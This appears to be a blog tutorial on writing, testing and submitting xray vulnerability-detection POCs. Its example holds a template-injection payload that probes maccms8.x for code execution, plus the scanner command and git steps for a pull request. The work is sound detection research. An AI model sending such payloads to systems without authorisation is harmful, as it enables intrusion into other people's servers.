Find an N-day

  1. https://www.exploit-db.com/

  2. 零组资料库

  3. CNVD

Write the POC

Example (the name field follows the pattern poc-<vulnerable product>-<CVE id>-<description, e.g. rce or weakpasswd>):

name: poc-漏洞产品-[CVE编号]-描述[rce/weakpasswd...]
set:
  r: randomInt(800000000, 1000000000)
rules:
  - method: GET
    path: /index.php?m=vod-search&wd={if-A:printf(md5({{r}}))}{endif-A}
    follow_redirects: false
    expression: |
      response.body.bcontains(bytes(md5(string(r))))
detail:
  Affected Version: "maccms8.x"
  author: hanxiansheng26(https://github.com/hanxiansheng26)
  links:
    - https://www.cnblogs.com/test404/p/7397755.html

The full syntax is documented in the official xray POC guide:

https://docs.xray.cool/#/guide/poc
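To make clear what the expression in the POC above actually decides, here is an added Python model of the marker-and-digest check; it is not code from this post or from xray and sends nothing to any host. A random marker r is placed inside the template directive, and the POC only fires when the md5 of r comes back in the body, which a host that merely reflects the query string cannot produce. The two response builders are constructed stand-ins for a real target, and randomInt is assumed to be inclusive like Python's randint.

```python
import hashlib
import random

# Constructed stand-ins for the real target: NOT xray code, and no
# network traffic. They only model the two shapes of response body so
# the POC's expression can be exercised offline.


def random_marker() -> int:
    """Mirror of the POC's `set: r: randomInt(800000000, 1000000000)`
    (assumed inclusive, like randint)."""
    return random.randint(800_000_000, 1_000_000_000)


def marker_digest(r: int) -> str:
    """md5(string(r)) as the POC's expression computes it."""
    return hashlib.md5(str(r).encode()).hexdigest()


def build_payload(r: int) -> str:
    """The template fragment the POC injects into the `wd` parameter."""
    return "{if-A:printf(md5(%d))}{endif-A}" % r


def simulate_executed_response(r: int) -> bytes:
    """Constructed body from a host that evaluates the template: the
    digest, not the template text, ends up in the page."""
    return ("<html><body>search results for: %s</body></html>"
            % marker_digest(r)).encode()


def simulate_reflected_response(r: int) -> bytes:
    """Constructed body from a host that only echoes the query string
    back (no template evaluation); the digest never appears."""
    return ("<html><body>search results for: %s</body></html>"
            % build_payload(r)).encode()


def expression_matches(body: bytes, r: int) -> bool:
    """Python equivalent of the POC rule
    `response.body.bcontains(bytes(md5(string(r))))`."""
    return marker_digest(r).encode() in body


if __name__ == "__main__":
    r = random_marker()
    print("marker:", r, "digest:", marker_digest(r))
    print("template executed ->", expression_matches(simulate_executed_response(r), r))
    print("payload reflected ->", expression_matches(simulate_reflected_response(r), r))
```

Running the script prints True for the executed body and False for the reflected one. The same reasoning applies to any POC built on a fresh random value and a one-way transform of it: a match proves the server computed something, a static marker string would also match pages that simply echo the request.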

Verify the POC

./xray webscan --poc xray/pocs/poc.yml --url http://127.0.0.1/

To see the exact requests being sent, set the HTTP proxy in the xray config file to Burp Suite.


Submit the POC

  1. Fork xray


  2. Clone it locally (the xray fork under your own account)


  3. Enter the xray directory and create a new branch (committing on the main branch also works)

    ┌[bufsnakeのMacBook Pro]-(~/Web-Pentest/xray/xray-dir)-[git://master ✗]-
    └> git branch test
    ┌[bufsnakeのMacBook Pro]-(~/Web-Pentest/xray/xray-dir)-[git://master ✗]-
    └> git checkout test
    M    pocs/glassfish-cve-2017-1000028-lfi.yml
    Switched to branch 'test'
    
  4. Move the finished POC file into the pocs directory, then commit and push

    ┌[bufsnakeのMacBook Pro]-(~/Web-Pentest/xray/xray-dir)-[git://test ✗]-
    └> git add .
    ┌[bufsnakeのMacBook Pro]-(~/Web-Pentest/xray/xray-dir)-[git://test ✗]-
    └> git commit -m "`date`"
    [test 63dfa7b] modify jupyter-notebook-unauthorized-access
    1 file changed, 1 insertion(+), 1 deletion(-)
    ┌[bufsnakeのMacBook Pro]-(~/Web-Pentest/xray/xray-dir)-[git://test ✔]-
    └> git push --set-upstream origin test
    
  5. Select the test branch and open a pull request


    Fill in the description and click Create


  6. Check whether the CI tests pass

    A ✓ means the CI tests passed.
    An × means you need to read the error details.

    For example (the original post shows screenshots of the CI result here).

  7. Fix the POC file according to the error output, then submit again

  8. Wait for the 长亭 (Chaitin) maintainers to review

Claim the reward


Unless otherwise stated, all articles on this blog are licensed under CC BY-SA 3.0. Please credit the source when reposting.